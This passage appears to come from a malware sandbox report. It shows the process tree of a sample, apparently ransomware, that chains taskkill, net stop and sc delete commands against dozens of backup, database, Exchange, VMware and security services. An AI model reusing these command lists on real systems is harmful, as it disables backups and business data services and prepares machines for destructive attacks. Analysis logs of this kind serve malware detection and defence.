C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetBackup Discovery Framework"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "NetBackup Legacy Client Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetBackup Legacy Client Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "NetBackup Legacy Network Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetBackup Legacy Network Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "NetBackup Proxy Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetBackup Proxy Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "NetBackup SAN Client Fibre Transport Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetBackup SAN Client Fibre Transport Service"6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld-nt.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM NFVPrint.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM licenceserver.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Launchpad.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "FileZilla Server.exe"5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM cbService.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM cbInterface.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM pvxwin32.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM pvxwin64.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM pvxcom.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM pvxiosvr.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Sage.NA.AT_AU.SysTray.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Sage.NA.AT_AU.Service.exe5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Tomcat7w.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Launchpad.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mpdwsvc.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cbVSCService11.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cbService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup115⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete cbVSCService115⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld-nt.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlceip.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM store.exe5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSExchangeMailboxReplication.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSExchangeThrottling.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM EdgeTransport.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSExchangeTransportLogSearch.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DataCollectorSvc.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.ServiceHost.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSExchangeMailboxAssistants.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msexchangerepl.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MsExchangeFDS.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSExchangeMailSubmission.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSExchangeTransport.exe5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowEngine"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DDSoftPwsTomcat9.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM U8SmartClient.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM U8SmartClientMonitor.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tomcat9.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SqlManagement.exe /F5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai"5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ReportingServicesService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$SQLEXPRESS"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete TongBackupSrv5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TongBackupSrv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UFMsgCenterService.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Cobian.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "SAP Business One.exe" /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\net.exenet stop "SQLBackupAndFTP Client Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLBackupAndFTP Client Service"6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "SqlBak.Service.exe" /F5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SAP Business One RSP Agent Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SAP Business One RSP Agent Service"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop SAPB1iDIProxy5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAPB1iDIProxy6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "SAPB1iDIProxy_Monitor"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SAPB1iDIProxy_Monitor"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SAPB1iEventSender5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAPB1iEventSender6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SBOClientAgent5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SBOClientAgent6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SBODI_Server5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SBODI_Server6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SBOJobServiceBackEnd5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SBOJobServiceBackEnd6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SBOMail5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SBOMail6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SBOWFDataAccess5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SBOWFDataAccess6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop SBOWorkflowEngine5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SBOWorkflowEngine6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "XT800Service_Personal"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLSERVERAGENT5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLBrowser5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLFDLauncher5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLSERVER5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete QcSoftService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLServerOLAPService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VMTools5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete VGAuthService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSDTC5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete TeamViewer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ReportServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RabbitMQ5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete "AHS SERVICE"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sense Shield Service"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete SSMonitorService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SSSyncService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdAppService13005⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQL$SQL20085⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLAgent$SQL20085⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdTaskService13005⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdUpgradeService13005⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete VirboxWebServer5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete jhi_service5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete LMS5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "FontCache3.0.0.0"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "DAService_TCP"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "eCard-TTransServer"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete eCardMPService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete EnergyDataService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UI0Detect5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete K3MobileService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TCPIDDAService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete WebAttendServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UIODetect5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "wanxiao-monitor"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete VMAuthdService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VMUSBArbService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VMwareHostd5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "vm-agent"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VmAgentDaemon5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OpenSSHd5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete eSightService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete apachezt5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Jenkins5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete secbizsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLTELEMETRY5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MSMQ5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete smtpsvrJT5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete zyb_sync5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntHttpServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntClientSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete NFWebServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete wampapache5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSEARCH5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete msftesql5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete "SyncBASE Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleDBConcoleorcl5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleMTSRecoveryService5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1ClrAgent5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1TNSListener5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleServiceORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete aspnet_state @sc delete Redis5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete JhTask5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete XT800Service_Personal5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MCService5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete allpass_redisservice_port211605⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Flash Helper Service"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete "Kiwi Syslog Server"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "UWS HiPriv Services"5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$FE_EXPRESS5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$FE_EXPRESS6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UWS LoPriv Services"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete ftnlsv35⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ftnlses35⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete FxService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "UtilDev Web Server Pro"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdwks5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client Guard"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE FileTranS"5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete wwbizsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete qemu-ga5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete AlibabaProtect5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete ZTEVdservice5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete kbasesrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MMRHookService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete IpOverUsbSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1005⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete KuaiYunTools5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete KMSELDI5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete btPanel5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Protect_2345Explorer5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete 2345PicSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-agent5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-server5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-worker5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete QQCertificateService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleRemExecService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDaemon5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSUserSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDownSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSStorageSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDataProcSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSGatewaySvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSMediaSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSLoginSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSTomcat65⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSMysqld5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSFtpd5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Zabbix Agent"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentAccelerator5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete bedbg5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecDeviceMediaService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecRPCService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentBrowser5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecJobEngine5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecManagementService5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete MDM5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TxQBService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Gailun_Downloader5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RemoteAssistService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete YunService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Serv-U5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "EasyFZS Server"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Rpc Monitor"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OpenFastAssist5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc delete "Nuo Update Monitor"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Daemon Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete asComSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OfficeUpdateService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RtcSrv5⤵
-
-
